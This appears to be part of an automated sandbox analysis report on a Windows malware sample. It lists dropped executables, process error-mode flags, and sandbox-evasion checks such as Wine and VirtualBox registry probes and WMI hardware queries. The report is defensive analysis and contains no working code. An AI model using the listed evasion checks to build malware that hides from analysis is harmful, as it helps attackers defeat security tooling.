Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (32 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX (76 identical entries)
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX (78 identical entries)
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_CURRENT_USER\Software\Wine (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_CURRENT_USER\Software\Wine (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (3 identical entries)
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine (2 identical entries)
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (2 identical entries)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
